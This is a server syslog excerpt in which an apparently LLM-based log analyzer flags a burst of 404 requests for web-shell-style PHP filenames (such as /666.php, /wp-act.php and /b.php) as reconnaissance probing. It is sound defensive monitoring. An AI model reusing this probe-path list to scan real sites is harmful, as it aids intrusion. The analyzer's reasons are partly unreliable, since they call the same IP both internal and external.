Mar 20 12:48:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:49.017697 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:48:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:49.017733 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to a common probe path (/222.php) returning 404 suggests a potential reconnaissance or probing activity from external IPs Line=2026-03-20T12:46:03.572582202Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /222.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:54.254714 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 12:48:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:54.254755 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:01.968454 [observer] Pipeline: processed=5279 pattern_hits=5136 llm_calls=143 llm_errors=3 learned=3
Mar 20 12:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:01.968532 [observer] Patterns: hash=5136 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=143
Mar 20 12:49:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:02.083836 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:49:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:02.083875 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for tool.php suggests possible probing or scanning activity; not definitive malicious but warrants investigation. Line=2026-03-20T12:46:03.706711412Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /tool.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:12.947600 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:49:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:12.947634 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Request to wp-act.php path with 404 response, indicative of WP vulnerability reconnaissance or probing. Line=2026-03-20T12:46:03.772621702Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /wp-act.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:18.927922 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:49:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:18.927956 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A 404 response for /cu.php in combination with a GET request from an internal IP suggests a potential probe or automated scanning for known vulnerable PHP files. Line=2026-03-20T12:46:03.843355499Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /cu.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:26.319153 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:49:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:26.319212 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /fs.php with 404 could indicate probing for vulnerabilities; not definitive but warrants attention. Line=2026-03-20T12:46:03.909886055Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /fs.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:31.934495 [observer] Pipeline: processed=5285 pattern_hits=5138 llm_calls=147 llm_errors=3 learned=3
Mar 20 12:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:31.934522 [observer] Patterns: hash=5138 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=147
Mar 20 12:49:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:34.928540 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:49:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:34.928574 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on /asd.php from internal IP may indicate probing or misconfigured route; not definitive attack but worth alerting Line=2026-03-20T12:46:03.979324406Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /asd.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:40.323801 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:49:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:40.323852 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:49:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:44.915380 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:49:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:44.915424 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /ms.php returning 404 could indicate probing for PHP scripts or hidden endpoints; not definitive malicious activity but warrants monitoring. Line=2026-03-20T12:46:04.115360051Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /ms.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:56.197451 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:49:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:56.197577 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to jga.php returning 404 from an external IP could indicate probing for common PHP entrypoints. Line=2026-03-20T12:46:04.181422041Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /jga.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:01.951231 [observer] Pipeline: processed=5293 pattern_hits=5142 llm_calls=151 llm_errors=3 learned=3
Mar 20 12:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:01.951261 [observer] Patterns: hash=5142 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=151
Mar 20 12:50:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:05.405352 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:50:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:05.405544 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to a suspicious path (/666.php) returning 404, which is a common probe for php files or web shells. Line=2026-03-20T12:46:04.247363254Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /666.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:50:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:13.348901 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:50:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:13.348938 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a PHP file path from an external IP suggests possible probing or accidental exposure; not definitive malware but warrants monitoring. Line=2026-03-20T12:46:04.314460547Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /zc-104.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:50:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:20.743398 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 12:50:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:20.743434 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a PHP file (ws88.php) from an external IP; could indicate probing or misconfigured path. Not definitive malware but warrants alert. Line=2026-03-20T12:46:04.386181183Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /ws88.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:50:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:26.344707 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 12:50:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:26.344743 [analyzer] Source hint mismatch: LLM says "webserver", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:31.940852 [observer] Pipeline: processed=5299 pattern_hits=5144 llm_calls=155 llm_errors=3 learned=3
Mar 20 12:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:31.940880 [observer] Patterns: hash=5144 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=155
Mar 20 12:50:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:34.697938 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:50:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:34.697973 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A 404 response for a request to /bo.php commonly indicates a probe for vulnerable scripts or misconfigurations; paired with external IPs in the log, this suggests potential probing activity. Line=2026-03-20T12:46:04.579616457Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /bo.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:50:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:41.060818 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:50:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:41.060854 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP request to a PHP endpoint returning 404; could indicate probing or misconfigured route. Not an immediate attack, but warrants attention. Line=2026-03-20T12:46:04.651107874Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /ws84.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:50:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:48.714867 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:50:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:48.714908 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET targeting a specific PHP file under public, resulting in 404. Could indicate probing for vulnerable paths or misconfigured public endpoints. Line=2026-03-20T12:46:04.717286829Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /public/vx.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:50:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:55.814421 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:50:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:55.814457 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /vanda.php could indicate automated probing for a known vulnerable script. Line=2026-03-20T12:46:04.783285610Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /vanda.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:01.951110 [observer] Pipeline: processed=5308 pattern_hits=5149 llm_calls=159 llm_errors=3 learned=3
Mar 20 12:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:01.951139 [observer] Patterns: hash=5149 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=159
Mar 20 12:51:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:07.285517 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:51:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:07.285552 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /amp.php returning 404; could indicate probing for AMP pages or misconfigured route. Not malicious by itself, but warrants attention. Line=2026-03-20T12:46:04.849304035Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /amp.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:51:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:13.049773 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:51:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:13.049809 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /a4.php with external IP in a rapid, simple request pattern can indicate probing for vulnerable or misconfigured PHP files. Line=2026-03-20T12:46:04.915068120Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /a4.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:51:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:19.844678 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:51:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:19.844720 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /1.php 404 from internal IPs suggests probing or misconfiguration; not clearly malicious but warrants monitoring Line=2026-03-20T12:46:04.988510316Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /1.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:51:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:28.947505 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 12:51:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:28.947546 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Public-facing GET /b.php returning 404 could indicate probing for known backdoor filenames; not definitely malicious but warrants scrutiny. Line=2026-03-20T12:46:05.054813271Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /b.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:31.936731 [observer] Pipeline: processed=5314 pattern_hits=5151 llm_calls=163 llm_errors=3 learned=3
Mar 20 12:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:31.936754 [observer] Patterns: hash=5151 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=163
Mar 20 12:51:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:34.540527 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:51:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:34.540566 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A 404 for a likely filename (hots.php) from a web request can indicate probing for common PHP scripts or mis-typed paths. Not definitive malicious activity but warrants alerts for potential scans. Line=2026-03-20T12:46:05.142585567Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /hots.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:51:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:39.622542 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:51:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:39.622576 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access log shows a request for wp-the.php returning 404, which is an unusual filename and could indicate probing for WordPress-related files. Line=2026-03-20T12:46:05.389705016Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /wp-the.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:51:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:46.597231 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 12:51:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:46.597272 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:51:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:53.473317 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.60 action=allow pattern_type=prefix
Mar 20 12:51:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:53.473359 [analyzer] Source hint mismatch: LLM says "nginx_access", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:01.621805 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.55 action=alert pattern_type=
Mar 20 12:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:01.621841 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a PHP file path (44.php) from a host may indicate probing for vulnerable or misnamed scripts. Line=2026-03-20T12:46:05.587187672Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /44.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:01.987254 [observer] Pipeline: processed=5323 pattern_hits=5155 llm_calls=168 llm_errors=3 learned=3
Mar 20 12:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:01.987289 [observer] Patterns: hash=5155 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=168
Mar 20 12:52:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:11.955448 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 12:52:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:11.955483 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:52:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:17.493839 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:52:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:17.493875 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=GET request for /xxw.php returning 404 could indicate probing for vulnerable or hidden PHP file names commonly used by scanners. Line=2026-03-20T12:46:05.726642368Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /xxw.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:52:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:24.059467 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 12:52:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:24.059505 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Er access to a PHP file path /sa.php7 returning 404 can indicate probing for vulnerable PHP endpoints. Line=2026-03-20T12:46:05.830463959Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /sa.php7 HTTP/1.0" 404 6603 "-" "-" "4.204.200.32"
Mar 20 12:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:31.935455 [observer] Pipeline: processed=5328 pattern_hits=5157 llm_calls=171 llm_errors=3 learned=3
Mar 20 12:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:31.935477 [observer] Patterns: hash=5157 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=171
Mar 20 12:52:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:32.231805 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 12:52:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:32.231850 [analyzer] Source hint mismatch: LLM says "docker", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:52:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:41.338003 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:52:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:41.338043 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a non-existent wp9.php page with 404 status may indicate probing for vulnerable PHP files. Line=2026-03-20T12:46:05.962761026Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /wp9.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:52:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:47.109807 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 12:52:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:47.109845 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /wen.php returning 404; could indicate probing for common or vulnerable scripts Line=2026-03-20T12:46:06.028706842Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /wen.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:52:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:52.711383 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:52:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:52.711417 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a wp5.php request from a web server can indicate probing for WordPress-related files. Line=2026-03-20T12:46:06.095826601Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /wp5.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:52:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:58.038389 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:52:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:58.038426 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=GET request for /varb.php returning 404 from a web server; unusual filename may indicate probing for common PHP scripts. Line=2026-03-20T12:46:06.161902581Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /varb.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:01.957591 [observer] Pipeline: processed=5335 pattern_hits=5159 llm_calls=176 llm_errors=3 learned=3
Mar 20 12:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:01.957625 [observer] Patterns: hash=5159 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=176
Mar 20 12:53:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:03.794788 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:53:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:03.794850 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /tt.php with external IP in request pattern may indicate probing for vulnerable PHP file. Line=2026-03-20T12:46:06.228416079Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /tt.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:53:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:14.038674 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:53:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:14.038711 [analyzer] Source hint mismatch: LLM says "webserver", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:53:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:23.263659 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:53:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:23.263698 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /vx.php with 404 suggests probing for a potentially vulnerable PHP file. Line=2026-03-20T12:46:06.360306295Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /vx.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:53:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:30.515783 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:53:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:30.515822 [analyzer] Source hint mismatch: LLM says "docker", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:31.935139 [observer] Pipeline: processed=5343 pattern_hits=5163 llm_calls=180 llm_errors=3 learned=3
Mar 20 12:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:31.935182 [observer] Patterns: hash=5163 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=180
Mar 20 12:53:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:41.052036 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.64 action=alert pattern_type=
